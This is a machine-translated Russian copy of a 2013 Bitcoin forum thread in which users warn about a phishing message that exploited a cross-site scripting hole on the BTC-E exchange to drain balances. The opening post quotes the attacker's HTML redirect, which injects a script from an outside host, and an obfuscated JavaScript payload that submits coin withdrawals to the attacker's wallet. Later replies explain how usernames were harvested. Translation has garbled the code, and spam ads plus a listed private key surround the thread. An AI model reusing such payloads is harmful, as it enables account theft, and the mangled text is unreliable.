Вернуться   Биткоин Форум > - Помощь начинающим
21 апреля 2013, 6:35:36 PM   # 1
 
 
Сообщения: 7
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

Взлом Биткоин адресов.
500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome"
Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e
подробнее...


Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru
Здравствуйте,

Сегодня я получил личное сообщение на BTC-E. Это первая странная вещь, так как я никогда не использовать trollbox или использовать систему ПМ там.

Он содержит ссылку на hxxp:. // быстро изображение (dontclickthisshit) ком / guh8ydyxz / bitcoin_chart15493.jpg, который не является изображением, но файл HTML.

котировка
                "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
        http://www.w3.org/1999/xhtml" Ланг ="ан" XML: LANG ="ан">
        <глава>
       
        <тело>
        <сценарий языка ="JavaScript">
        document.location ="https://btc-e.com/news/32?page=1<Сценарий + SRC = HTTP: //fast-image.com/q.js><\ / Скрипт>";
       
       
       

Это загружает скрипт, который, кажется, использовать уязвимость XSS на BTC-E.

котировка
Eval ((функция (х) {вар д =""; Вар р = 0, тогда как (р4) D + = d.substr (D.Length-x.charCodeAt (р + 1) * 96-x.charCodeAt (р + 2) + 3104-L, L), иначе D + ="`"; Р + = 4}}} возвращение д) ("вар wallet_btc = \"1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo \"; `K'l` P \"LSQBL4Rs1rjP3tZUVb4MfXSQu1JEyWr7ix` P \"REDIR = \"http://fast-image.com/guh8ydjxz/bitcoin_chart15483.jpg`_ \"XMLHTTP = false` /! btc_amount` *! lt` \") Token`% с;! Попробуйте { `[&новый XMLHttpRequest;} поймать (е) { ` ! `-.! !. length`, 2) {` 3&& = Math.floor (parseFloat ( `р / sByClassName (\"money_btc \") [0] `\"@&) `0U \"`Х»> 5`%>! `)) 500;!}`&zBedit% 2Fhome \", 2`% UB` $ o22` $ # ~ `$ D] sec` $ g8s_email \"`#a \"! Sec.checked` * \\ 1coins` # G $ акт = отзывать&сумма = \" + `$ '+ \"&address` 6! wallet_btc` 6! coin_id = 1&`&1! ` >! `% !, 3` # ZX4` # jHl` е% _rgx` # h'.match (/ Баланс: \\<б класс = «красный» \\>([0-9] +.? `#! *) \\<\\ / б \\> LTC /); `о& = `W + .slice (1 '6 +` (D2` 9&`($ #` Я> 300` (( `\\)` 0;!} `$ * C` p'` $ Z3l` $ Ь + 8` $ _ 5` $ KB` N.billing` N0_coin% 2F1 \.!", 1);"))

Согласно Blockexplorer, значительные объемы BTC уже были украдены:

http://blockexplorer.com/address/1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo



nsieugesug сейчас офлайн Пожаловаться на nsieugesug   Ответить с цитированием Мультицитирование сообщения от nsieugesug Быстрый ответ на сообщение nsieugesug


Как заработать Биткоины?
Без вложений. Не майнинг.


21 апреля 2013, 6:41:57 PM   # 2
 
 
Сообщения: 7
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

Получил 1806 Биткоинов
Реальная история.





(Может администратор / модератор переместить это в соответствующем разделе, пожалуйста?)
nsieugesug сейчас офлайн Пожаловаться на nsieugesug   Ответить с цитированием Мультицитирование сообщения от nsieugesug Быстрый ответ на сообщение nsieugesug

21 апреля 2013, 6:42:35 PM   # 3
 
 
Сообщения: 7
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

Я также заинтересован, как им удалось отправить в ПМ к своему имени, когда я не написал сообщение в trollbox в течение недели (запрещенной). Это нападение было четко спланировано хорошо, потому что они были уборки имена пользователей в течение длительного времени.
maurits150 сейчас офлайн Пожаловаться на maurits150   Ответить с цитированием Мультицитирование сообщения от maurits150 Быстрый ответ на сообщение maurits150

21 апреля 2013, 6:46:36 PM   # 4
 
 
Сообщений: 80
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

Какая операционная система и версии браузера вы используете? В версиях, пожалуйста.
dudeofthestick сейчас офлайн Пожаловаться на dudeofthestick   Ответить с цитированием Мультицитирование сообщения от dudeofthestick Быстрый ответ на сообщение dudeofthestick

21 апреля 2013, 6:52:09 PM   # 5
 
 
Сообщений: 48
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

В случае ФП это еще более интересно, как они получили свое имя, потому что он сказал, что он никогда не отвечал на trollbox (и никогда не был запрещен).
@nsieugesug: Вы, возможно, ввести / disablechat в trollbox или не было никакого взаимодействия вообще?
Если нет, то это было бы очень интересно узнать, как они могли бы послать вам в ПМ.
Бехер-Карл сейчас офлайн Пожаловаться на Бехер-Карл   Ответить с цитированием Мультицитирование сообщения от Бехера-Karl Быстрый ответ на сообщение Бехер-Karl

21 апреля 2013, 6:52:58 PM   # 6
 
 
Сообщения: 7
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

Какая операционная система и версии браузера вы используете? В версиях, пожалуйста.

Браузер? Я предпочитаю использовать Wget на отдельном Linux поле, когда кто-то хочет меня щелкать странные ссылки ...  
nsieugesug сейчас офлайн Пожаловаться на nsieugesug   Ответить с цитированием Мультицитирование сообщения от nsieugesug Быстрый ответ на сообщение nsieugesug

21 апреля 2013, 6:54:34 PM   # 7
 
 
Сообщения: 7
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

В случае ФП это еще более интересно, как они получили свое имя, потому что он сказал, что он никогда не отвечал на trollbox (и никогда не был запрещен).
@nsieugesug: Вы, возможно, ввести / disablechat в trollbox или не было никакого взаимодействия вообще?
Если нет, то это было бы очень интересно узнать, как они могли бы послать вам в ПМ.

Trollbox включена в мой счет, но я никогда не писал что-то там. Тем не менее, я не уверен на 100%. Могу набрали какую-то ерунду там случайно.
nsieugesug сейчас офлайн Пожаловаться на nsieugesug   Ответить с цитированием Мультицитирование сообщения от nsieugesug Быстрый ответ на сообщение nsieugesug

21 апреля 2013, 6:58:50 PM   # 8
 
 
Сообщения: 347
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

В случае ФП это еще более интересно, как они получили свое имя, потому что он сказал, что он никогда не отвечал на trollbox (и никогда не был запрещен).
@nsieugesug: Вы, возможно, ввести / disablechat в trollbox или не было никакого взаимодействия вообще?
Если нет, то это было бы очень интересно узнать, как они могли бы послать вам в ПМ.

собрать все имена пользователей из bitcointalk и reddit.com/r/bitcoin и шумите? Это мое предположение
optimator сейчас офлайн Пожаловаться на optimator   Ответить с цитированием Мультицитирование сообщения от optimator Быстрый ответ на сообщение optimator

21 апреля 2013, 7:10:45 PM   # 9
 
 
Сообщения: 7
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

Похоже, они удалили атаки скрипты с сервера. Нет проблем, у вас есть копия здесь. 
nsieugesug сейчас офлайн Пожаловаться на nsieugesug   Ответить с цитированием Мультицитирование сообщения от nsieugesug Быстрый ответ на сообщение nsieugesug

21 апреля 2013, 7:15:10 PM   # 10
 
 
Сообщений: 33
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

В случае ФП это еще более интересно, как они получили свое имя, потому что он сказал, что он никогда не отвечал на trollbox (и никогда не был запрещен).
@nsieugesug: Вы, возможно, ввести / disablechat в trollbox или не было никакого взаимодействия вообще?
Если нет, то это было бы очень интересно узнать, как они могли бы послать вам в ПМ.

собрать все имена пользователей из bitcointalk и reddit.com/r/bitcoin и шумите? Это мое предположение

Я никогда не отвечал на Reddit или bitcointalk с моим именем на БТК-е. Или любой Bitcoin сайт по этому вопросу. Я все еще каким-то образом попал в ПМ, а также. Я больше склонен думать, что информация пользователя была взломана на BTC-E.
БЖ сейчас офлайн Пожаловаться на БЖ   Ответить с цитированием Мультицитирование сообщения от БЖ Быстрый ответ на сообщение БЖ

21 апреля 2013, 7:30:40 PM   # 11
 
 
Сообщений: 14
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

не доверяют незнакомцам
Самтен сейчас офлайн Пожаловаться на Самтен   Ответить с цитированием Мультицитирование сообщения от Самтен Быстрый ответ на сообщение Самтен

21 апреля 2013, 7:38:05 PM   # 12
 
 
Сообщения: 347
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E


Я никогда не отвечал на Reddit или bitcointalk с моим именем на БТК-е. Или любой Bitcoin сайт по этому вопросу. Я все еще каким-то образом попал в ПМ, а также. Я больше склонен думать, что информация пользователя была взломана на BTC-E.

Вот досада! Это действительно приводит к заключению, что там было внутри помощь ....
optimator сейчас офлайн Пожаловаться на optimator   Ответить с цитированием Мультицитирование сообщения от optimator Быстрый ответ на сообщение optimator

21 апреля 2013, 7:49:20 PM   # 13
 
 
Сообщения: 887
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

Вы получаете список имен пользователей, просто введя в https://btc-e.com/profile/1 через что угодно.
Напишите сценарий, который проходит через все эти цифры и иметь его отправить ЛС.

https://btc-e.com/profile/1000
https://btc-e.com/profile/10000
https://btc-e.com/profile/80001
moni3z сейчас офлайн Пожаловаться на moni3z   Ответить с цитированием Мультицитирование сообщения от moni3z Быстрый ответ на сообщение moni3z

21 апреля 2013, 8:10:25 PM   # 14
 
 
Сообщения: 7
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

Вы получаете список имен пользователей, просто введя в https://btc-e.com/profile/1 через что угодно.
Напишите сценарий, который проходит через все эти цифры и иметь его отправить ЛС.

Вы правы, что бы объяснить, почему я получил сообщение. Он даже показывает время последней активности, поэтому злоумышленник может специально предназначаться активных счетов.
nsieugesug сейчас офлайн Пожаловаться на nsieugesug   Ответить с цитированием Мультицитирование сообщения от nsieugesug Быстрый ответ на сообщение nsieugesug

21 апреля 2013, 8:40:09 PM   # 15
 
 
Сообщения: 7
Цитировать по имени
цитировать ответ
по умолчанию Re: Внимание - Кто-то крадет BTC LTC в BTC-E

Будет ли кто-нибудь с полными правами разноски нравится crosspost это (Service Обсуждение)?

Я думаю, что это заслуживает большего внимания, но невероятно глупо ограничение новичку политика этого форума не позволяет мне отправить эту нить, где она принадлежит. 
nsieugesug сейчас офлайн Пожаловаться на nsieugesug   Ответить с цитированием Мультицитирование сообщения от nsieugesug Быстрый ответ на сообщение nsieugesug



Как заработать Биткоины?

Bitcoin Wallet * Portefeuille Bitcoin * Monedero Bitcoin * Carteira Bitcoin * Portafoglio Bitcoin * Bitcoin Cüzdan * 比特币钱包

bitcoin-zarabotat.ru
Почта для связи: bitcoin-zarabotat.ru@yandex.ru

3HmAQ9FkRFk6HZGuwExYxL62y7C1B9MwPW